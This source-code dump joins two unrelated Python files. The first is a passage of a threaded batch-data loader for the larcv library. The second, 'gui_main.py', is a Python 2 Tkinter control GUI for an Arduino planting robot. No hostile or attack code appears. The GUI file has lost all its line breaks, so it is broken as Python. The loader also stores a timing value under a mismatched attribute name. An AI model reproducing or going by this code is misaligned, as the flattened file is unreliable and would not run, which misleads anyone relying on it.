        self._storage_m[key]._storage_id = self._storage_id
        self._storage_m[key]._make_copy = make_copy

    def fetch_data(self, key):
        """Return the buffer registered under *key*, or None if unknown."""
        try:
            return self._storage_m[key]
        except KeyError:
            sys.stderr.write('Cannot fetch data w/ key %s (unknown)\n' % key)
            return

    def next(self):
        """Copy the current larcv batch into every registered buffer."""
        self._filled = False
        self._copy_start_time = time.time()
        for name, storage in self._storage_m.items():
            dtype = storage.dtype()
            batch_data = larcv.BatchDataStorageFactory(dtype).get().get_storage(name).get_batch(self._storage_id)
            storage.set_data(self._storage_id, batch_data)
        self._copy_end_time = time.time()
        self._filled = True

    def release(self):
        """Mark this slot as consumed so the IO thread refills it."""
        self._filled = False
        return


class threadio_pydata(object):
    """Numpy view/copy of one larcv batch product, plus timing metadata."""

    _name = None
    _storage_id = -1
    _dtype = None
    _npy_data = None
    _dim_data = None
    _time_copy = 0
    _time_reshape = 0
    _make_copy = False

    def __init__(self, name, dtype):
        self._name = str(name)
        self._storage_id = -1
        self._dtype = dtype
        self._npy_data = None      # numpy buffer (copy or zero-copy view)
        self._dim_data = None      # batch dimensions, fixed after first batch
        self._time_copy = None
        self._time_reshape = None
        self._make_copy = False

    def batch_data_size(self):
        """Total number of elements in one batch (product of dimensions)."""
        dsize = 1
        for v in self._dim_data:
            dsize *= v
        return dsize

    def dtype(self):
        return self._dtype

    def data(self):
        return self._npy_data

    def dim(self):
        return self._dim_data

    def time_copy(self):
        return self._time_copy

    def time_reshape(self):
        return self._time_reshape

    def set_data(self, storage_id, larcv_batchdata):
        """Copy (or wrap) *larcv_batchdata* into the numpy buffer.

        Raises TypeError/ValueError if the batch dimensions change between
        calls, since the buffer shape must stay constant.
        """
        self._storage_id = storage_id
        dim = larcv_batchdata.dim()

        # set dimension (first batch), or verify it did not change
        if self._dim_data is None:
            self._dim_data = np.array([dim[i] for i in range(dim.size())]).astype(np.int32)
        else:
            if not len(self._dim_data) == dim.size():
                sys.stderr.write('Dimension array length changed (%d => %d)\n'
                                 % (len(self._dim_data), dim.size()))
                raise TypeError
            for i in range(len(self._dim_data)):
                if not self._dim_data[i] == dim[i]:
                    sys.stderr.write('%d-th dimension changed (%d => %d)\n'
                                     % (i, self._dim_data[i], dim[i]))
                    raise ValueError

        # copy data into numpy array
        ctime = time.time()
        if self._make_copy:
            if self._npy_data is None:
                self._npy_data = np.array(larcv_batchdata.data())
            else:
                self._npy_data = self._npy_data.reshape(self.batch_data_size())
                larcv.copy_array(self._npy_data, larcv_batchdata.data())
        else:
            # zero-copy view of the larcv-owned buffer
            self._npy_data = larcv.as_ndarray(larcv_batchdata.data())
        self._time_copy = time.time() - ctime

        ctime = time.time()
        # floor division: under Py3 true division would pass a float to reshape
        self._npy_data = self._npy_data.reshape(
            self._dim_data[0], self.batch_data_size() // self._dim_data[0])
        self.time_data_conv = time.time() - ctime
        return


class larcv_threadio (object):
    """User-facing manager: configures a larcv.ThreadProcessor and serves
    filled batches round-robin across the storage slots."""

    # registry of all configured instances, keyed by filler name
    _instance_m = {}

    @classmethod
    def exist(cls, name):
        name = str(name)
        return name in cls._instance_m

    @classmethod
    def instance_by_name(cls, name):
        return cls._instance_m[name]

    def __init__(self):
        self._proc = None
        self._name = ''
        self._verbose = False
        self._cfg_file = None
        self._target_storage_id = 0
        self._storage_v = []
        self._thread_v = []

    def reset(self):
        self.stop_manager()
        if self._proc:
            self._proc.reset()

    def __del__(self):
        try:
            self.reset()
        except AttributeError:
            # partially-constructed instance: nothing to clean up
            # (fixed: original misspelled "AttrbuteError", a NameError)
            pass

    def configure(self, cfg):
        """Configure from dict *cfg*; requires 'filler_name' and 'filler_cfg'."""
        # if "this" was configured before, reset it
        if self._name:
            self.reset()
        # get name
        if not cfg['filler_name']:
            sys.stderr.write('filler_name is empty!\n')
            raise ValueError
        # ensure unique name
        if self.__class__.exist(cfg['filler_name']) and not self.__class__.instance_by_name(cfg['filler_name']) == self:
            sys.stderr.write('filler_name %s already running!' % cfg['filler_name'])
            return
        self._name = cfg['filler_name']
        # get ThreadProcessor config file
        self._cfg_file = cfg['filler_cfg']
        if not self._cfg_file or not os.path.isfile(self._cfg_file):
            sys.stderr.write('filler_cfg file does not exist: %s\n' % self._cfg_file)
            raise ValueError
        # set verbosity
        if 'verbosity' in cfg:
            self._verbose = bool(cfg['verbosity'])
        # configure thread processor
        self._proc = larcv.ThreadProcessor(self._name)
        self._proc.configure(self._cfg_file)
        self._storage_v = []
        for storage_id in range(self._proc.storage_status_array().size()):
            self._storage_v.append(threadio_storage(storage_id))
        # fetch batch filler info and register every product on every slot
        make_copy = bool('make_copy' in cfg and cfg['make_copy'])
        for i in range(self._proc.batch_fillers().size()):
            pid = self._proc.batch_fillers()[i]
            name = self._proc.storage_name(pid)
            dtype = larcv.BatchDataTypeName(self._proc.batch_types()[i])
            for storage_id in range(self._proc.storage_status_array().size()):
                self._storage_v[storage_id].register(name, dtype, make_copy=make_copy)
        # all success? register *this* instance
        self.__class__._instance_m[self._name] = self

    def start_manager(self, batch_size):
        """Start the ThreadProcessor and one IO thread per storage slot."""
        if not self._proc or not self._proc.configured():
            sys.stderr.write('must call configure(cfg) before start_manager()!\n')
            return
        try:
            batch_size = int(batch_size)
            if batch_size < 1:
                sys.stderr.write('batch_size must be positive integer!\n')
                raise ValueError
        except (TypeError, ValueError):
            # fixed: "except TypeError, ValueError:" was Py2-only syntax that
            # bound the exception to the name ValueError instead of catching it
            sys.stderr.write('batch_size value/type error. aborting...\n')
            return
        self._batch = batch_size
        self._proc.start_manager(batch_size)
        for storage in self._storage_v:
            self._thread_v.append(threading.Thread(target=threadio_func,
                                                   args=[storage, self._proc]))
            self._thread_v[-1].daemon = True
            self._thread_v[-1].start()
        self._target_storage_id = 0

    def stop_manager(self):
        """Stop the ThreadProcessor and signal the IO threads to exit."""
        if not self._proc or not self._proc.configured():
            sys.stderr.write('must call configure(cfg) before start_manager()!\n')
            return
        self._batch = None
        self._proc.stop_manager()
        for storage in self._storage_v:
            storage._threaded = False
        time.sleep(0.1)
        self._thread_v = []

    def purge_storage(self):
        """Stop the manager and release all batch data held by larcv."""
        if not self._proc or not self._proc.configured():
            sys.stderr.write('must call configure(cfg) before start_manager()!\n')
            return
        self.stop_manager()
        self._proc.release_data()
        self._target_storage_id = 0

    def set_next_index(self, index):
        """Set the entry index the ThreadProcessor reads next."""
        if not self._proc or not self._proc.configured():
            sys.stderr.write('must call configure(cfg) before start_manager()!\n')
            return
        self._proc.set_next_index(index)

    def is_reading(self, storage_id=None):
        """True while the (current) storage slot is still being filled."""
        if storage_id is None:
            storage_id = self._target_storage_id
        return not self._storage_v[storage_id]._filled

    def next(self):
        """Block until the current slot is filled, then advance round-robin."""
        while self.is_reading():
            time.sleep(0.000002)
        self._proc.release_data(self._target_storage_id)
        self._storage_v[self._target_storage_id].release()
        self._target_storage_id += 1
        if self._target_storage_id == self._proc.num_batch_storage():
            self._target_storage_id = 0
        return

    def fetch_data(self, key, storage_id=None):
        """Return the buffer for *key* in the given (or current) slot."""
        if storage_id is None:
            storage_id = self._target_storage_id
        try:
            return self._storage_v[storage_id].fetch_data(key)
        except IndexError:
            sys.stderr.write('Cannot fetch data w/ storage id {:d} (unknown)\n'.format(storage_id))
            return

    def fetch_event_ids(self, storage_id=None):
        if storage_id is None:
            storage_id = self._target_storage_id
        return self._storage_v[storage_id]._event_ids

    def fetch_entries(self, storage_id=None):
        if storage_id is None:
            storage_id = self._target_storage_id
        return self._storage_v[storage_id]._ttree_entries

    def fetch_n_entries(self):
        return self._proc.get_n_entries()


def sig_kill(signum, frame):
    """SIGINT handler: reset every registered filler before exiting."""
    print('\033[95mSIGINT detected.\033[00m Finishing the program gracefully.')
    for name, ptr in larcv_threadio._instance_m.items():
        print('Terminating filler: %s' % name)
        ptr.reset()


signal.signal(signal.SIGINT, sig_kill)
gui_main.py
import cv2 import numpy as np import threading import json import random import math import time import types #import Tkinter from Tkinter import * import tkFileDialog import ttk import tkMessageBox import tkFont import ScrolledText import Pmw from PIL import Image from PIL import ImageTk from os import listdir, path, makedirs, remove from datetime import datetime from class_ArduinoSerMntr import* from class_CameraMntr import* import class_MyThread import class_ImageProcessing from class_PlantIdentifier import PlantIdentifier import imgProcess_tool import gui_vars from class_ConfigSetting import ConfigSetting #from class_ConfigSetting_new import ConfigSetting from dialog_PeripheralSetting import PeripheralSetting from dialog_MotorSetting import MotorSetting from dialog_CameraConnection import CameraConnection import utils_tool class App: # Ininitalization def __init__(self,root): strFont= 'Arial' myfont14 = tkFont.Font(family=strFont, size=14, weight= tkFont.BOLD) myfont12 = tkFont.Font(family=strFont, size=12)#, weight= tkFont.BOLD) myfont12_Bold = tkFont.Font(family=strFont, size=12, weight= tkFont.BOLD) myfont10 = tkFont.Font(family=strFont, size=10) myfont10_Bold = tkFont.Font(family=strFont, size=10, weight= tkFont.BOLD) #2018.02.28 myfont8 = tkFont.Font(family=strFont, size=8, weight= tkFont.BOLD) self.bgGreen= '#007700' self.bgGreen_active= '#00aa00' bgGray= '#333333333' bgGray_active= 'gray' bgGray_select= '#999' self.bgRed= '#aa0000' self.bgRed_active= '#ee0000' self.Move_intervalUnit= 1 ''' self.root = Tkinter.Tk() self.root.title("[Arduino] Stepper Control") self.root.attributes('-zoomed', True) # FullScreen ''' self.root= root self.root.update() # ================================= # Parameters # ================================= if utils_tool.check_path(gui_vars.saveParaPath): print 'ICON...' 
self.img_icon = Tkinter.PhotoImage(file = gui_vars.saveParaPath+'Icon_2.png') #img_icon = Tkinter.PhotoImage(file = gui_vars.saveParaPath+'img_Seed.png') #print self.img_icon self.root.tk.call('wm', 'iconphoto', self.root._w, self.img_icon) self.config= ConfigSetting(gui_vars.saveParaPath, gui_vars.configName, gui_vars.defaultDict) params= self.config.read_json() #print 'para: ',params self.threshold_graylevel= params['thrshd_gray'] self.threshold_MinSize= params['thrshd_Minsize'] self.threshold_MaxSize= params['thrshd_Maxsize'] self.scan_X= params['Scan_X (Beg,Interval,Amount)'] self.scan_Y= params['Scan_Y (Beg,Interval,Amount)'] self.limit= params['limit Maximum (X,Y)'] self.MaxSpeed= params['Max Speed (X, Y)'] self.Acceleration= params['Ac/Deceleration (X, Y)'] self.CameraID= params['Camera ID'] self.Peripheral_para= params['Peripheral Setting'] self.rdbtnMvAmount_Mode= params['Move Amount type (5 types)'] self.scriptPath= params['script Path'] self.pinNumb_fan= 8 self.pinNumb_water= 9 self.pinNumb_seed= 10 #for key, value in params['Peripheral Setting']: for key, value in self.Peripheral_para: #2018.02.28 print key, value #2018.02.28 if key.strip().replace(' ','').lower() == 'waterpump': # is -> == 2018.02.28 self.pinNumb_water= value print 'pinNumb_water: ', self.pinNumb_water #2018.02.28 if key.strip().replace(' ','').lower() == 'vaccumpump': # is -> == 2018.02.28 self.pinNumb_seed= value print 'pinNumb_seed: ', self.pinNumb_seed #2018.02.28 if key.strip().replace(' ','').lower() == 'fan': # is -> == 2018.02.28 self.pinNumb_fan= value print 'pinNumb_fan: ', self.pinNumb_fan #2018.02.28 print 'Pin Value: ',self.Peripheral_para #2018.02.28 self.imageProcessor= class_ImageProcessing.contour_detect(gui_vars.savePath,gui_vars.saveParaPath) self.checkmouse_panel_mergeframe= False self.x1, self.y1, self.x2, self.y2= -1,-1,-1,-1 self.StartScan_judge= False self.StartRunScript_judge= False self.saveScanning= 'XXX' self.strStatus= 'Idling...' 
self.readmergeframeIndex= '' self.root.update() self.screen_width, self.screen_height= self.root.winfo_width(), self.root.winfo_height() print 'screen: ',[self.root.winfo_screenwidth(), self.root.winfo_screenheight()] print 'w, h: ',[self.root.winfo_width(), self.root.winfo_height()] btn_width, btn_height= 8, 1 #gui_vars.interval_x, gui_vars.interval_y= 6, 6 self.mergeframe_spaceY= 50 #print width,',', height,' ; ',btn_width,',', btn_height # ======================================= # [Config] Menu Bar # ======================================= self.menubar= Tkinter.Menu(self.root) self.FileMenu = Tkinter.Menu(self.menubar, tearoff=0) self.menubar.add_cascade(label="File",underline=0, menu=self.FileMenu) self.FileMenu.add_command(label="Load Image", command=self.btn_loadImg_click) self.FileMenu.add_command(label="Save Image", command=self.btn_saveImg_click) self.SettingMenu = Tkinter.Menu(self.menubar, tearoff=0) self.SettingMenu.add_command(label= "Peripheral Setting", command= self.set_Peripheral) self.SettingMenu.add_command(label= "Motor Setting", command= self.set_Motor) self.menubar.add_cascade(label="Setting", underline=0, menu=self.SettingMenu) self.ConnectMenu = Tkinter.Menu(self.menubar, tearoff=0) self.ConnectMenu.add_command(label="Connect to Arduino", command=self.set_ArdConnect) self.ConnectMenu.add_command(label="Connect to Camera", command=self.set_CamConnect) self.menubar.add_cascade(label="Communication", underline= 0, menu=self.ConnectMenu) self.ImgProcess= Tkinter.Menu(self.menubar, tearoff=0) self.ImgProcess.add_command(label="Set Background", command= self.plastic_set_background) self.ImgProcess.add_command(label='Otsu Binary', command= self.method_OtsuBinary) self.menubar.add_cascade(label="Image Processing", underline=0, menu= self.ImgProcess) self.root.config(menu= self.menubar) self.root.update() # ======================================= # [Config] Status Bar # ======================================= self.statuslabel = 
Tkinter.Label(self.root, bd = 1, relief = Tkinter.SUNKEN, anchor = "w") self.statuslabel.config(text="IDLING ..................") self.statuslabel.pack(side = Tkinter.BOTTOM,fill=Tkinter.X) self.root.update() # ================================================== # [ROOT] Current position of motor # ================================================== self.lbl_CurrPos= Tkinter.Label(self.root, text="Location: (X, Y, Z)= (-1, -1, -1)",font= myfont14) self.lbl_CurrPos.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() # ==================== # [Config] Tabpages # ==================== self.screen_width, self.screen_height= self.root.winfo_width(), self.root.winfo_height() #Left_width= self.lbl_MoveCoord.winfo_reqwidth()+ gui_vars.interval_x*11 Left_width= int((self.screen_width-gui_vars.interval_x*2)*0.25) Left_height= int((self.screen_height-self.FileMenu.winfo_reqheight()*1- self.statuslabel.winfo_reqheight()*0-gui_vars.interval_y*2- self.lbl_CurrPos.winfo_reqheight())) self.tabbox = ttk.Notebook(self.root, width=Left_width, height=Left_height) self.tab_control = Tkinter.Frame(self.root) self.tab_loadscript = Tkinter.Frame(self.root) self.tab_imageprocess = Tkinter.Frame(self.root) self.tabbox.add(self.tab_control, text="CONTROL") self.tabbox.add(self.tab_loadscript, text="LOAD SCRIPT") self.tabbox.add(self.tab_imageprocess, text="IMAGE") #self.tabbox.place(x= 0, y= 0) self.tabbox.place(x= 0, y= self.lbl_CurrPos.winfo_y()+ self.lbl_CurrPos.winfo_reqheight()+ gui_vars.interval_y) self.root.update() print '*** Input Tab', Left_width, Left_height print '*** TAB',self.tabbox.winfo_reqwidth(), self.tabbox.winfo_reqheight() # ================================================== # [TAB CONTROL] Step Motor Control # ================================================== self.lbl_MoveCoord= Tkinter.Label(self.tab_control, text="[ MOVE ]", font= myfont14) #self.lbl_MoveCoord.place(x= gui_vars.interval_x, y= self.lbl_CurrPos.winfo_y()+ 
self.lbl_CurrPos.winfo_height()+gui_vars.interval_y) self.lbl_MoveCoord.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() # ================================================== # [TAB CONTROL] Move Amount Radio Button # ================================================== #self.rdbtnMvAmount_Mode= [('100', 100),('500', 500),('1k',1000),('10k',10000), ('100k',100000)] #self.rdbtnMvAmount_Mode= [('10mm', 10),('50mm', 50),('100mm',100),('200mm',200), ('500mm',500)] -2018.02.28-CGH #Save in Farmbot_GeneralAP\Para\config.json - 2018.02.28 self.MvAmount= Tkinter.IntVar() self.rdbtn_MvAmount_1= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[0][0], value= self.rdbtnMvAmount_Mode[0][1],variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_1.place(x= gui_vars.interval_x, y=self.lbl_MoveCoord.winfo_y()+ self.lbl_MoveCoord.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.rdbtn_MvAmount_5= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[1][0], value=self.rdbtnMvAmount_Mode[1][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_5.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_1.winfo_x()+ self.rdbtn_MvAmount_1.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_10= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[2][0], value=self.rdbtnMvAmount_Mode[2][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) 
self.rdbtn_MvAmount_10.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_5.winfo_x()+ self.rdbtn_MvAmount_5.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_50= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[3][0], value=self.rdbtnMvAmount_Mode[3][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_50.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_10.winfo_x()+ self.rdbtn_MvAmount_10.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() self.rdbtn_MvAmount_100= Tkinter.Radiobutton(self.tab_control, text= self.rdbtnMvAmount_Mode[4][0], value=self.rdbtnMvAmount_Mode[4][1], variable= self.MvAmount,font= myfont12_Bold, command= self.rdbtn_MvAmount_click, indicatoron=0, width=5, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active,selectcolor= bgGray_select) self.rdbtn_MvAmount_100.place(x= gui_vars.interval_x+ self.rdbtn_MvAmount_50.winfo_x()+ self.rdbtn_MvAmount_50.winfo_reqwidth(),y= self.rdbtn_MvAmount_1.winfo_y()) self.root.update() #self.rdbtn_MvAmount_10.select() #self.Move_interval= self.rdbtnMvAmount_Mode[2][1] self.rdbtn_MvAmount_1.select() #2018.02.28 self.Move_interval= self.rdbtnMvAmount_Mode[0][1] #2018.02.28 self.lbl_posUnit_1= Tkinter.Label(self.tab_control, text='(step)') self.lbl_posUnit_1.place(x= self.rdbtn_MvAmount_100.winfo_x()+ self.rdbtn_MvAmount_100.winfo_width(), y= self.rdbtn_MvAmount_1.winfo_y()+gui_vars.interval_y) self.root.update() # ================================================== # [TAB CONTROL] Move 1 interval at specific Axis # ================================================== photo_up= self.IconResize(gui_vars.saveParaPath+'img_Up.png') self.btn_MoveUp= Tkinter.Button(self.tab_control,image= photo_up, cursor= 'hand2', command= lambda: 
self.btn_MoveAmount_click('Up')) self.btn_MoveUp.image= photo_up self.btn_MoveUp.place(x= self.rdbtn_MvAmount_10.winfo_x()+int(self.rdbtn_MvAmount_10.winfo_reqwidth()*0), y=self.rdbtn_MvAmount_1.winfo_y()+ self.rdbtn_MvAmount_1.winfo_reqheight()+ gui_vars.interval_y) self.root.update() photo_down= self.IconResize(gui_vars.saveParaPath+'img_Down.png') self.btn_MoveDown= Tkinter.Button(self.tab_control,image= photo_down, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Down')) self.btn_MoveDown.image= photo_down self.btn_MoveDown.place(x= self.btn_MoveUp.winfo_x(), y=self.btn_MoveUp.winfo_y()+ self.btn_MoveUp.winfo_reqheight()+ gui_vars.interval_y) self.root.update() photo_left= self.IconResize(gui_vars.saveParaPath+'img_Left.png') self.btn_MoveLeft= Tkinter.Button(self.tab_control,image= photo_left, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Left')) self.btn_MoveLeft.image= photo_left self.btn_MoveLeft.place(x= self.btn_MoveDown.winfo_x()- self.btn_MoveDown.winfo_width()- gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()) self.root.update() photo_right= self.IconResize(gui_vars.saveParaPath+'img_Right.png') self.btn_MoveRight= Tkinter.Button(self.tab_control,image= photo_right, cursor= 'hand2', command= lambda: self.btn_MoveAmount_click('Right')) self.btn_MoveRight.image= photo_right self.btn_MoveRight.place(x= self.btn_MoveDown.winfo_x()+ self.btn_MoveDown.winfo_width()+ gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()) self.root.update() self.btn_MoveZUp= Tkinter.Button(self.tab_control,image= photo_up, cursor= 'hand2', command= lambda: self.btn_MoveAmountZaxis_click('Up')) self.btn_MoveZUp.image= photo_up self.btn_MoveZUp.place(x= self.btn_MoveRight.winfo_x()+ self.btn_MoveRight.winfo_reqwidth()+ gui_vars.interval_x*4, y=self.btn_MoveUp.winfo_y()) self.root.update() self.btn_MoveZDown= Tkinter.Button(self.tab_control,image= photo_down, cursor= 'hand2', command= lambda: self.btn_MoveAmountZaxis_click('Down')) 
self.btn_MoveZDown.image= photo_down self.btn_MoveZDown.place(x= self.btn_MoveZUp.winfo_x(), y=self.btn_MoveDown.winfo_y()) self.root.update() # ================================================== # [TAB CONTROL] Seeding, Watering, Lighting, Grab Image # ================================================== photo_seed= self.IconResize(gui_vars.saveParaPath+'img_Seed.png') self.btn_Seed= Tkinter.Button(self.tab_control,image= photo_seed, cursor= 'hand2', command= self.btn_Seed_click) self.btn_Seed.image= photo_seed self.btn_Seed.place(x= self.btn_MoveUp.winfo_x()- int(self.btn_MoveUp.winfo_reqwidth()*2)- gui_vars.interval_x, y=self.btn_MoveDown.winfo_y()+ self.btn_MoveDown.winfo_reqheight()+ gui_vars.interval_y*2) self.root.update() photo_water= self.IconResize(gui_vars.saveParaPath+'img_Water.png') self.btn_Water= Tkinter.Button(self.tab_control,image= photo_water, cursor= 'hand2', command= self.btn_Water_click) self.btn_Water.image= photo_water self.btn_Water.place(x= self.btn_Seed.winfo_x()+ int(self.btn_Seed.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() photo_light= self.IconResize(gui_vars.saveParaPath+'img_Light.png') self.btn_Light= Tkinter.Button(self.tab_control,image= photo_light, cursor= 'hand2', command= self.btn_Light_click) self.btn_Light.image= photo_light self.btn_Light.place(x= self.btn_Water.winfo_x()+ int(self.btn_Water.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() photo_cam= self.IconResize(gui_vars.saveParaPath+'img_Cam.png') self.btn_CamGrab= Tkinter.Button(self.tab_control,image= photo_cam, cursor= 'hand2', command= self.btn_saveImg_click) self.btn_CamGrab.image= photo_cam self.btn_CamGrab.place(x= self.btn_Light.winfo_x()+ int(self.btn_Light.winfo_reqwidth()*1.5)+ gui_vars.interval_x, y=self.btn_Seed.winfo_y()) self.root.update() # ================================================== # [TAB CONTROL] Move To # ================================================== 
self.lbl_Xpos= Tkinter.Label(self.tab_control, text= 'X :',font= myfont12) #self.lbl_Xpos.place(x= gui_vars.interval_x, y = self.btn_MoveDown.winfo_y()+ self.btn_MoveDown.winfo_height()+gui_vars.interval_y*3) self.lbl_Xpos.place(x= gui_vars.interval_x, y = self.btn_Seed.winfo_y()+ self.btn_Seed.winfo_height()+gui_vars.interval_y*3) self.root.update() self.entry_Xpos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Xpos.insert(Tkinter.END, "0") self.entry_Xpos.place(x= self.lbl_Xpos.winfo_x()+ self.lbl_Xpos.winfo_width(), y= self.lbl_Xpos.winfo_y()) self.root.update() self.lbl_Ypos= Tkinter.Label(self.tab_control, text= 'Y :',font= myfont12) self.lbl_Ypos.place(x= self.entry_Xpos.winfo_x()+ self.entry_Xpos.winfo_width()+ gui_vars.interval_x, y = self.lbl_Xpos.winfo_y()) self.root.update() self.entry_Ypos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Ypos.insert(Tkinter.END, "0") self.entry_Ypos.place(x= self.lbl_Ypos.winfo_x()+ self.lbl_Ypos.winfo_width(), y= self.lbl_Ypos.winfo_y()) self.root.update() self.lbl_Zpos= Tkinter.Label(self.tab_control, text= 'Z :',font= myfont12) self.lbl_Zpos.place(x= self.entry_Ypos.winfo_x()+ self.entry_Ypos.winfo_width()+ gui_vars.interval_x, y = self.lbl_Xpos.winfo_y()) self.root.update() self.entry_Zpos= Tkinter.Entry(self.tab_control, font= myfont12, width=4) self.entry_Zpos.insert(Tkinter.END, "0") self.entry_Zpos.place(x= self.lbl_Zpos.winfo_x()+ self.lbl_Zpos.winfo_width(), y= self.lbl_Zpos.winfo_y()) self.root.update() self.lbl_posUnit= Tkinter.Label(self.tab_control, text='(step)') self.lbl_posUnit.place(x= self.entry_Zpos.winfo_x()+ self.entry_Zpos.winfo_width(), y= self.entry_Zpos.winfo_y()+gui_vars.interval_y) self.root.update() self.btn_MoveTo= Tkinter.Button(self.tab_control, text= 'GO', command= self.btn_MoveTo_click,font= myfont12_Bold, bg= self.bgGreen, fg= 'white', activebackground= self.bgGreen_active, activeforeground= 'white') self.btn_MoveTo.place(x= 
self.lbl_posUnit.winfo_x()+ self.lbl_posUnit.winfo_reqwidth()+ gui_vars.interval_x, y=self.lbl_Ypos.winfo_y()) self.btn_MoveTo.focus_set() self.root.update() # ================================================== # [TAB CONTROL] Scanning Control # ================================================== self.lbl_Scan= Tkinter.Label(self.tab_control, text="[ AUTO-SCAN ]", font= myfont14) self.lbl_Scan.place(x= gui_vars.interval_x, y= self.btn_MoveTo.winfo_y()+ self.btn_MoveTo.winfo_height()+gui_vars.interval_y) self.root.update() self.lbl_Scan1stPt= Tkinter.Label(self.tab_control, text= '*Start point (X, Y):',font= myfont12) self.lbl_Scan1stPt.place(x= gui_vars.interval_x, y = self.lbl_Scan.winfo_y()+ self.lbl_Scan.winfo_height()+gui_vars.interval_y) self.root.update() self.entry_1stXpos= Tkinter.Entry(self.tab_control, font= myfont12, width= 6) self.entry_1stXpos.insert(Tkinter.END, '{0}'.format(self.scan_X[0])) self.entry_1stXpos.place(x= self.lbl_Scan1stPt.winfo_x(), y= self.lbl_Scan1stPt.winfo_y()+ self.lbl_Scan1stPt.winfo_height()) self.root.update() self.lbl_Scan1stPt_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_Scan1stPt_comma.place(x=self.entry_1stXpos.winfo_x()+self.entry_1stXpos.winfo_width(), y= self.entry_1stXpos.winfo_y()) self.root.update() self.entry_1stYpos= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_1stYpos.insert(Tkinter.END, '{0}'.format(self.scan_Y[0])) self.entry_1stYpos.place(x= self.lbl_Scan1stPt_comma.winfo_x()+self.lbl_Scan1stPt_comma.winfo_width(), y= self.lbl_Scan1stPt_comma.winfo_y()) self.root.update() self.lbl_ScanInterval= Tkinter.Label(self.tab_control, text='* Interval (X, Y) :', font= myfont12) self.lbl_ScanInterval.place(x= self.entry_1stYpos.winfo_x()+ self.entry_1stYpos.winfo_reqwidth()+ gui_vars.interval_x*4, y= self.lbl_Scan1stPt.winfo_y()) self.root.update() self.entry_ScanInterval_X= Tkinter.Entry(self.tab_control, font=myfont12, width=6) 
self.entry_ScanInterval_X.insert(Tkinter.END, '{0}'.format(self.scan_X[1])) self.entry_ScanInterval_X.place(x= self.lbl_ScanInterval.winfo_x(), y= self.lbl_ScanInterval.winfo_y()+self.lbl_ScanInterval.winfo_height()) self.root.update() self.lbl_ScanInterval_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_ScanInterval_comma.place(x=self.entry_ScanInterval_X.winfo_x()+self.entry_ScanInterval_X.winfo_width(), y= self.entry_ScanInterval_X.winfo_y()) self.root.update() self.entry_ScanInterval_Y= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_ScanInterval_Y.insert(Tkinter.END, '{0}'.format(self.scan_Y[1])) self.entry_ScanInterval_Y.place(x= self.lbl_ScanInterval_comma.winfo_x()+self.lbl_ScanInterval_comma.winfo_width(), y= self.lbl_ScanInterval_comma.winfo_y()) self.root.update() self.lbl_ScanAmount= Tkinter.Label(self.tab_control, text='* Scanning Step (X, Y) :', font= myfont12) self.lbl_ScanAmount.place(x= self.entry_1stXpos.winfo_x(), y= self.entry_1stXpos.winfo_y()+ self.entry_1stXpos.winfo_height()+gui_vars.interval_y) self.root.update() self.entry_ScanAmount_X= Tkinter.Entry(self.tab_control, font=myfont12, width=6) self.entry_ScanAmount_X.insert(Tkinter.END, '{0}'.format(self.scan_X[2])) self.entry_ScanAmount_X.place(x= self.lbl_ScanAmount.winfo_x(), y= self.lbl_ScanAmount.winfo_y()+self.lbl_ScanAmount.winfo_height()) self.root.update() self.lbl_ScanAmount_comma= Tkinter.Label(self.tab_control, text= ', ', font= myfont12) self.lbl_ScanAmount_comma.place(x=self.entry_ScanAmount_X.winfo_x()+self.entry_ScanAmount_X.winfo_width(),y= self.entry_ScanAmount_X.winfo_y()) self.root.update() self.entry_ScanAmount_Y= Tkinter.Entry(self.tab_control, font= myfont12, width=6) self.entry_ScanAmount_Y.insert(Tkinter.END, '{0}'.format(self.scan_Y[2])) self.entry_ScanAmount_Y.place(x= self.lbl_ScanAmount_comma.winfo_x()+self.lbl_ScanAmount_comma.winfo_width(), y= self.lbl_ScanAmount_comma.winfo_y()) self.root.update() 
